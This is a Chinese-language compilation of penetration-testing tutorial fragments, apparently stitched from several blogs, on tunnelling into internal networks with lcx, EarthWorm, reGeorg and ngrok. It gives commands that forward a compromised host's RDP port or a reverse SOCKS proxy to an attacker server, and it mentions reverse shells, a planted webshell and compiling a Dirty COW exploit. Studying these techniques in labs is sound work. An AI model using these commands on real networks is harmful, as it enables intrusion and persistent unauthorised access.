lcx实现端口转发 概念 比较经典的就是lcx。简单说一下概念,首先内网中的主机一般都是使用的私有ip,在网络出口处经过NAT转换为公网ip后,才能访问internet。...所以,有时当我们进入网站后台cmd,或者捕获了一台内网中的肉鸡,是无法主动去链接这台肉鸡的,也不好在别人的网络出口做端口映射,这就体现lcx的作用了。...lcx实现端口转发,将肉鸡A上的某个端口(常用的3389),转发到具有公网地址的主机B上,这样我们只需要连接主机B的3389端口就相当于连接到了肉鸡A上,从而突破了内网私有ip的限制。...使用 攻击者ip:192.168.1.2 受害者ip:192.168.1.3 将lcx.exe上传到受害者主机上,执行: lcx.exe -slave 192.168.1.2 8080 192.168.1.3...3389 然后攻击者主机上执行: lcx.exe -listen 8080 9999 这样就将受害者主机的3389服务转发到攻击者本地的9999端口上了。
工具介绍 Lcx是一个端口转发工具,有windows版和linux两个版本(linux版本名为protmap) 前期准备: 公网主机vps:103.45.99.224 受害机内网ip:127.0.0.1...工具使用 Windows 内网主机上执行:lcx.exe -slave 例: 将内网主机(10.211.55.3)的3389端口转发到公网主机...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 公网vps尝试访问8989端口 ? ? Linux 内网主机上执行: ....公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 收到会话,随后使用xshell链接 ? ? ?
下面就先详细讲解下LXC转发工具与使用方法: lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上, 当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389...上传lcx.exe到肉鸡 然后 cx.exe -listen 51 3389 意思是监听51端口并转发到3389端口。...[+] Waiting for Client on port:51 …… 然后在肉鸡上运行 lcx.exe -slave 你的IP 51 222.221.221.22 3389 222.221.221.22...3389连接时格式 127.0.0.1:3333 内网转发姿势 一、lcx 的使用 肉鸡上执行:lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口 例如:lcx.exe -slave...–listen 10000 10001 例如:Lcx.exe –listen 10001 10000 意思是监听公网 ip 机器上的 10001 端口请求,并将 10001 的请求传送给 10000
什么情况下需要端口转发: Web服务器在内网中,远程桌面无法连接,因此需要进行端口转发。...工具: lcx.exe: 有一个弊端只能windows公网服务器可以使用。...lcx.exe 实例演示: 环境: 目标服务器 Windows Sever2003 内网IP :192.168.181.141 无外网IP ...我们有一个外网IP:10.22.124.132 在目标机器上执行lcx.exe -slave 10.22.124.132 6666 127.0.0.1 3389 意思是把目标机器的 3389
的场景) LCX实现本地端口转发(Linux的场景) LCX实现SSH到内网主机(公网服务器是Windows) LCX实现SSH到内网主机(公网服务器是Linux) LCX实现3389到内网主机(公网服务器是...Windows) LCX实现3389到内网主机(公网服务器是Linux) 内网转发 在渗透测试中,当我们获得了外网服务器(如web服务器,ftp服务器,mali服务器等等)的一定权限后发现这台服务器可以直接或者间接的访问内网...现在有这么一个环境,我们获取到了位于公网Web服务器的shell,该web服务器是Linux系统,内网中存在另外一台主机,这里假设内网存在一台Web服务器。...Lcx有它的局限性,比如原始版本不支持linux,不免杀等等,但lcx在某些特定的场合依然发挥着重要的作用。同样基于Socket协议。...我们现在想SSH到内网Linux主机。 于是,我们还可以利用lcx来进行3389端口的转发。
工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,更多平台的支持还在维护中,敬请期待。...该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。 1. 正向 SOCKS v5 服务器 $ ....多级级联 工具中自带的三条端口转发指令, 它们的参数格式分别为: $ ./ew -s lcx_listen -l 1080 -e 8888 $ ....127.0.0.1 -e 7777 数据流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks 补充说明: 1.为了减少网络资源的消耗,程序中添加了超时机制...在多级级联功能中,超时机制将以隧道中最短的时间为默认值 2.多级级联的三种状态可以转发任意以TCP为基础的通讯服务,包括远程桌面/ssh服务 等。
Part.0 目录 一、端口转发类 1.Lcx 本地端口转发 正向端口转发 反向端口转发 Linux版lcx 2、Netsh 本地端口转发 正向端口转发 3、SSH 二、SOCKS代理类 1...Linux版lcx Linux版本的lcx叫做portmap 先将对应的c文件上传至linux服务器中: ? 通过gcc进行编译后即可使用: gcc portmap.c -o lcx ?.../lcx -m l -p1 8888 -h2 192.168.3.140 -p2 3389 ? 尝试连接linux的8888端口: ? 成功连接至window的3389端口: ?...reGeorg+proxychains 攻击机如果为linux环境,则使用proxychains进行代理。第一步依然是将webshell上传至目标服务器: ?...可以直接在浏览器中开启代理: ? //这里使用的是FoxyProxy插件。 代理后尝试访问内网服务器80端口: ? //成功~ 或者使用Proxifier开启代理: ? 配置代理规则: ?
这里仅记录后渗透中与EW相关的部分已提前在tomcat中留下冰蝎马。 ? 二、本文介绍 1.准备工作 2.EW是什么,可以做什么。...工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。...EW共有 6 种命令格式(ssocksd正向、rcsocks反弹、rssocks反弹、lcx_slave级联 、lcx_listen级联 、lcx_tran级联 )。...其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理,其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。...如果是Linux用bash脚本,如果是Win用bat脚本或上PS如Empire的arpscan模块、Nishang的Invoke-ARPScan.ps1。
内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。...多级级联 工具中自带的三条端口转发指令, 它们的参数格式分别为: $ ./ew -s lcx_listen -l 1080 -e 8888 $ ..../ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 b) lcx_listen、lcx_slave 的用法 $ ....-l 1080 -e 888 即在公网代理机器中添加转接隧道,将1080端口收到的代理请求转发给888端口 B主机执行,利用socksd方式启动999端口的SOCKS代理: ew -s ssocksd...ew -s rssocks -d 10.10.21.5 -e 777 B主机显示: 代理服务器为内网服务器,无法访问百度 代理成功 这种情况就是多级代理,在渗透测试中,遇到多层内网环境核心区域
Kali地址:192.168.61.130(攻击机地址) 靶机win2008: 192.168.61.134(模拟外网私人地址) 中间跳板ngrok :vipgz4.idcfengye.com 工具:lcx...windows版与linux版 一、反弹shell到本地 1.首先注册个ngrok并配置好需要转接的端口:8848(这里就不在赘述如何配置了,网上教程很多。)...由于是通过Ngrok中转反弹到的shell,所以portfwd命令不能将远程桌面直接在metaspolit框架中实现,这里借助lcx继续进行反弹。...二、转发3389端口到本地 1.在Kali中执行lcx监听和转发命令: ....2.到靶机中执行lcx端口转发,通过meterperter进入shell执行命令: lcx -slave vipgz4.idcfengye.com 10040 127.0.0.1 3389 slave后跟
将lcx.exe上传至本机和肉鸡之后,首先确定本机的 IP 为119.90.140.191: ? 然后我们在本机执行: lcx.exe -listen 51 3388 ?...之后,我们在本机或其他主机上使用远程连接客户端,连接119.90.140.191:3388,可以看到lcx中显示了转发的信息。 ?...远程连接客户端的封包会发给主机的lcx,之后会发给肉鸡的lcx,之后会发给肉鸡的远程连接服务。响应封包会按原路返回。 等待一会儿之后,我们成功连接了肉鸡的远程桌面: ?...Linux Exp 提权 首先根据uname -a查看内核版本,之后根据内核版本找 Exp: ? 之后我们执行以下命令来编译: gcc -pthread exp.c -o exp 然后执行....附录 米斯特白帽子培训第二期视频教程 Kali Linux 秘籍 第七章 权限提升 CVE-2016-5195 脏牛漏洞
在渗透过程中,我们需要快速实现内网穿透,从而绕过网络访问限制,直接从外网来访问内网。今天,我们来推荐几款非常好用的内网穿透工具,如有其它推荐,欢迎补充和指正。...Ngrok客户端,支持Windows、Linux、Mac,提供python、PHP等版本。...(3)将natapp分配的网址复制下来,在浏览器中访问,可以看到内网穿透成功了! ?...支持Windows、Linux、MacOS、Arm-Linux。...8、Tunna Tunna是一款神奇的工具,它可以通过HTTP封装隧道通信任何TCP,以及用于绕过防火墙环境中的网络限制。
效果如下 至此已经拿到了目标机器cmd权限 ngrok结合lcx使用转发3389端口 目标机器: lcx -slave server.ngrok.cc 33388 127.0.0.1...3389 本地指定监听: lcx -listen 9991 33389 然后连接我们本地的33389端口: 结合msf反弹meterpreter shell 首先本地开启...该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran) 这里介绍一下反弹socks5端口转发 公网Linux上:.../ew_for_linux64 -s rcsocks -l 1080 -e 8888 目标机器上: ew_for_Win.exe -s rssocks -d 公网ip -e 8888
对于以上三种情况,lcx可以突破1和2二种,但是第3种就没有办法了,因为lcx在使用中需要访问外部网络。 这里的第3种就可以用到我们今天重点要讲的SOCKS代理。...0×03 socket端口转发 首先我们介绍下最为经典也是使用最为频繁的端口转发工具lcx,lcx.exe 是一个基于 socket 套接字实现的端口转发工具,它是从 linux 下的htran 工具移植到...即可访问右侧内部网络中10.48.128.25服务器的3389端口。 Lcx工具实现的是一对一的端口转发,如果想访问右侧网络中列出的所有端口,就必须一次次的重复lcx的转发过程,效率相当低下。...0×04 SOCKS代理工具 socks代理其实也可理解为一个增强版的 lcx,它在服务端监听一个服务端口,当有新的连接请求时会从socks协议中解析出访问目标的URL的目标端口,再开始执行lcx的具体功能...0×05 架设代理服务端 在实际渗透测试中,我经常使用的socks工具是EW,该程序体积很小,LINUX的只有30KB左右,Windows下面的也只有56KB,而且不需要再做其他设置,真的是居家旅行之必备之物
_server.tar.gztar xzvf linux_amd64_server.tar.gzcd ~/nps 在nps目录下面会有一个nps可执行文件、conf配置目录和web网页目录,我们只需要修改...##bridgebridge_type=tcpbridge_port=443 # 修改连接端口bridge_ip=0.0.0.0 启动 #Mac/Linux....该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。 1. 正向 SOCKS v5 服务器 $ ....多级级联 工具中自带的三条端口转发指令, 它们的参数格式分别为: $ ./ew -s lcx_listen -l 1080 -e 8888 $ ..../ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 b) lcx_listen、lcx_slave 的用法 $ .
环境配置 该操作在vm虚拟机中完成,提前安装了Windows7、kali linux、Windows server2008。...分别是win7、server2008、kali linux 因为需要从不同的角度来进行配置ip地址,所以在这里先不固定ip地址。...LCX Lcx是一款端口转发工具,一般使用条件: 内网服务器可以出网 服务器在外网,但是服务器安装了某些防护禁止敏感端口连接,如果发生这种,可以查看哪些端口允许传输数据,用这些端口将3389端口进行转发...4.1 windows下使用 直接使用lcx.exe在两个主机上进行使用 首先在内网机winserver2008上使用端口转发 Lcx是一种一对一的端口转发,效率比较低,而且又可能会被杀软杀掉。...4.2 Linux下用 这里使用的是一台 Ubuntu 16.04 10.211.55.14 还有一台kali linux 10.211.55.23 Usage:.
---- 内网跨边界应用 前言 与内网渗透系列:内网穿透(隧道)学习可以互相补充 一、内网跨边界转发 1、NC端口转发 netcat瑞士军刀 参见Kali linux 学习笔记(四)基本工具熟悉——nc.../ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 lcx_listen、lcx_slave 的用法 $ ....,基于Python2.7和urllib3,上传一个Tunnel脚本,然后远程连接转发端口即可建立socket代理隧道 对于aspx的网站假如总是报错,可以尝试ashx脚本 PHP程序确认php.ini中socket...模块正常开启并且可用,reGeorge也提供了nosocket脚本 linux下利用proxychains,Windows下利用proxifier实现任意应用通过代理 假如绑定某些端口会遇到socket...myPassword 15、SCP 本地到远程 scp file user@host.com:/tmp 远程到本地 scp user@host.com:/tmp file 16、rsync 远程rsync服务器中拷贝文件到本地机
第一节 场景1 端口映射 端口映射的使用,以下图为例,这是一个在渗透测试中,比较常见的场景。 ?...一个hacker通过扫描暴露到公网中的主机A ,主机A开放了一些敏感端口,而且是弱口令,导致主机A被hacker完全控制。...接着hacker就想往公司内网中渗透,通过在主机A监控流量或者扫描的方式,发现了主机B,但是主机B只能由主机A进行访问,开放了80端口,而且没有公网ip。...虽然已经有木马运行在主机B中,但是由于主机B不在公网中,hacker无法访问到主机B。...第三节 lcx lcx是一款内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。这个工具很早就已经有了,现在已经有跨平台的了,支持在windows、linux下使用。
2.利用NC工具在linux执行反弹shell (1)Linux正向连接shell 假设在linux操作系统中想要获取反弹shell,其中反弹方式和上述演示的Windows操作系统不同,以两台linux...(2)利用Linux自带bash反弹Shell 1)首先在攻击机中使用nc执行nc -lvp 8888命令开启监听,执行结果如图1-10所示。...三.端口转发 接下来将为读者介绍最常见的lcx端口转发工具的使用场景,lcx工具是一个红队人员在内网渗透测试中最典型的端口转发工具,lcx工具可分为Windows和Linux两个版本,这里以lcx工具为例...1.Lcx工具正向连接 1)查看lcx工具命令帮助信息,执行lcx.exe -help命令,如图1-19所示。...2.Lcx工具反向连接 1)反向连接和上述所讲的正向连接恰好相反,首先在跳板机上开启监听,执行lcx.exe -listen 6666 8888命令用来监听本机6666端口,并将该端口的连接映射到本机的
一、LCX lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap, lcx有两大功能: 1)端口转发(listen和...slave成对使用) 2)端口映射(tran) 1、lcx 内网端口转发 1.内网主机上执行:lcx.exe –slave 公网主机ip 公网主机端口 内网主机ip 内网主机端口 例如: lcx.exe...Linux版使用方法: 先在具有公网ip的主机上执行: ....show 0M +– 1M 由于当前拓扑中只有一个agent,所以展示结果只有 1M , 其中1 为节点的ID号, M为MacOS系统的简写,Linux为L,Windows简写为W。.../configure && make (这里我提供的压缩包中该软件是已经编译好的!)
领取专属 10元无门槛券
手把手带您无忧上云